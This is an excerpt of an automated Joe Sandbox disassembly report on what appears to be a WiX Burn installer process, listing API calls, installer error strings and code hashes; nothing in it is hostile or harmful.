                                                                                                                • Instruction Fuzzy Hash: 67616E71A0065DABDB12CFA6CC85BEE7BB8AF48758F164119FE14B7250D734DD408B90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009B1020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,009B0C6F,?,00000000,?,00000000,00000000), ref: 009B104F
                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 009B0DF3
                                                                                                                • GetLastError.KERNEL32 ref: 009B0E00
                                                                                                                Strings
                                                                                                                • Failed to create syncpoint event., xrefs: 009B0E2E
                                                                                                                • Failed to append cache action., xrefs: 009B0D4A
                                                                                                                • Failed to append rollback cache action., xrefs: 009B0CCF
                                                                                                                • Failed to append package start action., xrefs: 009B0C95
                                                                                                                • plan.cpp, xrefs: 009B0E24
                                                                                                                • Failed to append payload cache action., xrefs: 009B0DAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareCreateErrorEventLastString
                                                                                                                • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                                                                • API String ID: 801187047-2489563283
                                                                                                                • Opcode ID: 706c99178198d413db67b1b58dd32f0a82cdeb44e6a4fb7f6b83e388c7d685ee
                                                                                                                • Instruction ID: 3a8f5b574c20af72f4b857c926286468a1573d1446c5a194f75dd6a493428b1e
                                                                                                                • Opcode Fuzzy Hash: 706c99178198d413db67b1b58dd32f0a82cdeb44e6a4fb7f6b83e388c7d685ee
                                                                                                                • Instruction Fuzzy Hash: BF619D75500609EFCB05DF58CA80AABBBF9FFC4320F21845AE9099B251EB31EE41DB50
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,type,000000FF,?,74DEDFD0,74DEDFD0,74DEDFD0), ref: 009E6F55
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E6FA0
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E701C
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E7068
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Free$Compare
                                                                                                                • String ID: `<u$type$url
                                                                                                                • API String ID: 1324494773-1686489133
                                                                                                                • Opcode ID: e2b4a8673e9e08165e4c7b07b6148c37dfedf284e15372501e195aba42435862
                                                                                                                • Instruction ID: 182acb81c29202c2bc02c83cbeb7d8a6f68d708212f3049ab7c05f80b43f6cc9
                                                                                                                • Opcode Fuzzy Hash: e2b4a8673e9e08165e4c7b07b6148c37dfedf284e15372501e195aba42435862
                                                                                                                • Instruction Fuzzy Hash: 63515D35905259FFCB26DFA5C884FAEBBB8AF04321F1446A9E511EB1A1D7319E00DB50
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,009EB500,00000000,?), ref: 009B06D3
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,009EB500,00000000,?), ref: 009B06E2
                                                                                                                  • Part of subcall function 009E0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,009B061A,?,00000000,00020006), ref: 009E0C0E
                                                                                                                Strings
                                                                                                                • %ls.RebootRequired, xrefs: 009B05F0
                                                                                                                • Failed to open registration key., xrefs: 009B071A
                                                                                                                • Failed to update resume mode., xrefs: 009B06B7
                                                                                                                • Failed to write volatile reboot required registry key., xrefs: 009B061E
                                                                                                                • Failed to delete registration key: %ls, xrefs: 009B0681
                                                                                                                • crypt32.dll, xrefs: 009B05AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$Create
                                                                                                                • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
                                                                                                                • API String ID: 359002179-3398658923
                                                                                                                • Opcode ID: 069f65febce66e2fe90c7b140418cc0665d5d57c9d817ab1a9bdfb98cabaa96c
                                                                                                                • Instruction ID: 56db816a5efc699dd16df23c352d443f5344a8544499756620e33e68bdab4560
                                                                                                                • Opcode Fuzzy Hash: 069f65febce66e2fe90c7b140418cc0665d5d57c9d817ab1a9bdfb98cabaa96c
                                                                                                                • Instruction Fuzzy Hash: 3B418031800618FBDF22AEA1DE06FEF7BBAAFC0324F104519F51562161D7719A60DB91
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009AF48A
                                                                                                                  • Part of subcall function 009A4115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,009BA0E8,00000000,00000000,?,00000000,009A53BD,00000000,?,?,009AD5B5,?), ref: 009A4123
                                                                                                                  • Part of subcall function 009A4115: GetLastError.KERNEL32(?,009BA0E8,00000000,00000000,?,00000000,009A53BD,00000000,?,?,009AD5B5,?,00000000,00000000), ref: 009A4131
                                                                                                                • lstrlenA.KERNEL32(009EB500,00000000,00000094,00000000,00000094,?,?,009B04BF,swidtag,00000094,?,009EB518,009B04BF,00000000,?,00000000), ref: 009AF4DD
                                                                                                                  • Part of subcall function 009E4DB3: CreateFileW.KERNEL32(009EB500,40000000,00000001,00000000,00000002,00000080,00000000,009B04BF,00000000,?,009AF4F4,?,00000080,009EB500,00000000), ref: 009E4DCB
                                                                                                                  • Part of subcall function 009E4DB3: GetLastError.KERNEL32(?,009AF4F4,?,00000080,009EB500,00000000,?,009B04BF,?,00000094,?,?,?,?,?,00000000), ref: 009E4DD8
                                                                                                                Strings
                                                                                                                • Failed to format tag folder path., xrefs: 009AF543
                                                                                                                • Failed to allocate regid folder path., xrefs: 009AF53C
                                                                                                                • Failed to write tag xml to file: %ls, xrefs: 009AF51B
                                                                                                                • Failed to create regid folder: %ls, xrefs: 009AF525
                                                                                                                • Failed to allocate regid file path., xrefs: 009AF535
                                                                                                                • swidtag, xrefs: 009AF49D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                                                                • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                                                                                • API String ID: 904508749-1201533908
                                                                                                                • Opcode ID: b2b52d55f73d9d44b800c53e558efc142365a8cc96e6bb1df36947949d334075
                                                                                                                • Instruction ID: cc6e5be1c0e67719b0a95f3cddcb9152a61ce2ea754527fe1f8dda73f263fc98
                                                                                                                • Opcode Fuzzy Hash: b2b52d55f73d9d44b800c53e558efc142365a8cc96e6bb1df36947949d334075
                                                                                                                • Instruction Fuzzy Hash: 8E316C32D00219FBCF12AFD4CC51BADBBB5AF45710F148165F910BA261D7719E50ABD0
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,009A548E,00000000,00000000,?,00000000), ref: 009B548B
                                                                                                                • GetLastError.KERNEL32(?,?,?,009A4C61,?,?,00000000,?,?,?,?,?,?,009EB4A0,?,?), ref: 009B5496
                                                                                                                Strings
                                                                                                                • Failed to post terminate message to child process., xrefs: 009B5476
                                                                                                                • Failed to wait for child process exit., xrefs: 009B54C4
                                                                                                                • Failed to post terminate message to child process cache thread., xrefs: 009B545A
                                                                                                                • pipe.cpp, xrefs: 009B54BA
                                                                                                                • Failed to write exit code to message buffer., xrefs: 009B5406
                                                                                                                • Failed to write restart to message buffer., xrefs: 009B542E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastObjectSingleWait
                                                                                                                • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                • API String ID: 1211598281-2161881128
                                                                                                                • Opcode ID: dc5a6b7d6ec3afeb392bf117abd031900cb8c3b2aac8fbd851a26cda2166cc29
                                                                                                                • Instruction ID: e57f0296c901a6bb717f323fed547ea842bf5544459ff47765d22352502fe148
                                                                                                                • Opcode Fuzzy Hash: dc5a6b7d6ec3afeb392bf117abd031900cb8c3b2aac8fbd851a26cda2166cc29
                                                                                                                • Instruction Fuzzy Hash: 7A210A33940A2EBBDF225B94DD05FEE776AAF40735F124251FA10B61A0D734AD9097D0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,009B9F04,00000003,000007D0,00000003,?,000007D0), ref: 009B90B2
                                                                                                                • GetLastError.KERNEL32(?,009B9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 009B90BF
                                                                                                                • CloseHandle.KERNEL32(00000000,?,009B9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 009B9187
                                                                                                                Strings
                                                                                                                • Failed to verify catalog signature of payload: %ls, xrefs: 009B914E
                                                                                                                • Failed to verify signature of payload: %ls, xrefs: 009B912F
                                                                                                                • Failed to open payload at path: %ls, xrefs: 009B9103
                                                                                                                • Failed to verify hash of payload: %ls, xrefs: 009B9172
                                                                                                                • cache.cpp, xrefs: 009B90F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorFileHandleLast
                                                                                                                • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                • API String ID: 2528220319-2757871984
                                                                                                                • Opcode ID: a79470721d28b16353b03405a0403250e877263c6130c8adfb1798d70f783fef
                                                                                                                • Instruction ID: d266ffe8f70c644e5bcd8f3a3d70e47073549503fd0164dc5ffa9b66690ba799
                                                                                                                • Opcode Fuzzy Hash: a79470721d28b16353b03405a0403250e877263c6130c8adfb1798d70f783fef
                                                                                                                • Instruction Fuzzy Hash: D621E73255863BB7CB321A5C8D8DFEA7A1DAF81770F104211FF14661A093359C61FAE1
                                                                                                                APIs
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 009A6B69
                                                                                                                • GetLastError.KERNEL32 ref: 009A6B73
                                                                                                                • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 009A6BB7
                                                                                                                • GetLastError.KERNEL32 ref: 009A6BC1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                • API String ID: 124030351-4026719079
                                                                                                                • Opcode ID: d34a18421a4631a5d0c3de42492e3cb433d587f1faa9856196c3200376f17801
                                                                                                                • Instruction ID: 72c87a5f86cc82d1205267bd1b642969cb8e6ac41eba8af70a15da24d9bfb7d1
                                                                                                                • Opcode Fuzzy Hash: d34a18421a4631a5d0c3de42492e3cb433d587f1faa9856196c3200376f17801
                                                                                                                • Instruction Fuzzy Hash: 31214B73E4523C67D73097958C06F9F73ACAB81B20F110165BE44FB241EA34AE4086F5
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009A9C88
                                                                                                                • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,009AA895,00000100,000002C0,000002C0,?,000002C0), ref: 009A9CA0
                                                                                                                • GetLastError.KERNEL32(?,009AA895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 009A9CAB
                                                                                                                Strings
                                                                                                                • Failed to format variable string., xrefs: 009A9C93
                                                                                                                • search.cpp, xrefs: 009A9CDB
                                                                                                                • Failed get to file attributes. '%ls', xrefs: 009A9CE8
                                                                                                                • Failed to set variable., xrefs: 009A9D2B
                                                                                                                • File search: %ls, did not find path: %ls, xrefs: 009A9CFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesErrorFileLastOpen@16
                                                                                                                • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                • API String ID: 1811509786-2053429945
                                                                                                                • Opcode ID: 7e7063e789f3019088a7c2f1f7965f4b8a01b36052c8d819484001e1619532cb
                                                                                                                • Instruction ID: 1f965bc7e95749c695096f6ba775a202942a91f4812c6880e1a19af8bd814b24
                                                                                                                • Opcode Fuzzy Hash: 7e7063e789f3019088a7c2f1f7965f4b8a01b36052c8d819484001e1619532cb
                                                                                                                • Instruction Fuzzy Hash: E0218B33940634BBDB2216958C42FAEB668FF53775F210211FE187A1D0D7616D90D2D1
                                                                                                                APIs
                                                                                                                • TlsSetValue.KERNEL32(?,?), ref: 009BAD57
                                                                                                                • GetLastError.KERNEL32 ref: 009BAD61
                                                                                                                • CoInitializeEx.OLE32(00000000,00000000), ref: 009BADA0
                                                                                                                • CoUninitialize.OLE32(?,009BC721,?,?), ref: 009BADDD
                                                                                                                Strings
                                                                                                                • Failed to initialize COM., xrefs: 009BADAC
                                                                                                                • elevation.cpp, xrefs: 009BAD85
                                                                                                                • Failed to pump messages in child process., xrefs: 009BADCB
                                                                                                                • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 009BAD8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                • API String ID: 876858697-113251691
                                                                                                                • Opcode ID: cb8f11af82676605ce2dea4773f555db462eecab71267800043124317fce61f4
                                                                                                                • Instruction ID: 8ec64da14d03eb0329f0ac2023b97602defc9b4e62ff420792791b0bdff1eab9
                                                                                                                • Opcode Fuzzy Hash: cb8f11af82676605ce2dea4773f555db462eecab71267800043124317fce61f4
                                                                                                                • Instruction Fuzzy Hash: 0B115973916639BB8B221785CD4AADFBE68EFC5B727010116FE00BB290DB70AC0097D1
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 009A5D68
                                                                                                                  • Part of subcall function 009E10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009E112B
                                                                                                                  • Part of subcall function 009E10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 009E1163
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$Close
                                                                                                                • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                • API String ID: 1979452859-3209209246
                                                                                                                • Opcode ID: bf15ef613406bf77d50ff71b88c750c881c2bc853021845bf7a9925bfb561645
                                                                                                                • Instruction ID: 5c1420b39853e08047adcfc0c4f5d32ff851aa70e3449222635f10119a247ca5
                                                                                                                • Opcode Fuzzy Hash: bf15ef613406bf77d50ff71b88c750c881c2bc853021845bf7a9925bfb561645
                                                                                                                • Instruction Fuzzy Hash: 29012832B456A9F7CF235656DC0AF9E77A8CFC2720F164265F9007A261D7718E40D6D0
                                                                                                                APIs
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 009CA33E
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 009CA348
                                                                                                                Strings
                                                                                                                • download, xrefs: 009CA308
                                                                                                                • Failed to clear readonly bit on payload destination path: %ls, xrefs: 009CA377
                                                                                                                • apply.cpp, xrefs: 009CA36C
                                                                                                                • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 009CA425
                                                                                                                • :, xrefs: 009CA3C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesErrorFileLast
                                                                                                                • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                                                                • API String ID: 1799206407-1905830404
                                                                                                                • Opcode ID: 5290c9201bea18307c92d37b9583ad11be4a847eabe47d56047c7de630306d20
                                                                                                                • Instruction ID: 50f18444d5e88ccb50ddc22d0a03ae4a1d87ac322176d751c7ca2cd8cf8eca8b
                                                                                                                • Opcode Fuzzy Hash: 5290c9201bea18307c92d37b9583ad11be4a847eabe47d56047c7de630306d20
                                                                                                                • Instruction Fuzzy Hash: 46518C71E00619ABDB21DFA9C891FAEB7B8FF54714F108059E914EB250E375EE40CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,009C9063,000002C0,00000100), ref: 009E84F5
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,009C9063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 009E8510
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareHeapString$AllocateProcess
                                                                                                                • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                • API String ID: 2664528157-4206478990
                                                                                                                • Opcode ID: 3873e05b77ecd0908faa971ac7ce2b7fcc8bcf274ba8f7f8b4a2163f077c7980
                                                                                                                • Instruction ID: 0564f735b07f1437763bcc792ebfba07c4caffa18ab1594e79af09b6b0db68f8
                                                                                                                • Opcode Fuzzy Hash: 3873e05b77ecd0908faa971ac7ce2b7fcc8bcf274ba8f7f8b4a2163f077c7980
                                                                                                                • Instruction Fuzzy Hash: F451D471644345BFDB229F96CC81F1B7BA9AB40B20F208558F929AB2E1DF71ED409B50
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32 ref: 009E6513
                                                                                                                • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 009E660A
                                                                                                                • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 009E6619
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseDeleteErrorFileHandleLast
                                                                                                                • String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                                                                                • API String ID: 3522763407-1704223933
                                                                                                                • Opcode ID: 797141222761e55ef326e39d34f2bfea23b66bf08f00b9f366484c21aae0115c
                                                                                                                • Instruction ID: 06fdd35a7acf46df8e58e6a09f79e1bfd671cce4e1d964e8554aa82185227012
                                                                                                                • Opcode Fuzzy Hash: 797141222761e55ef326e39d34f2bfea23b66bf08f00b9f366484c21aae0115c
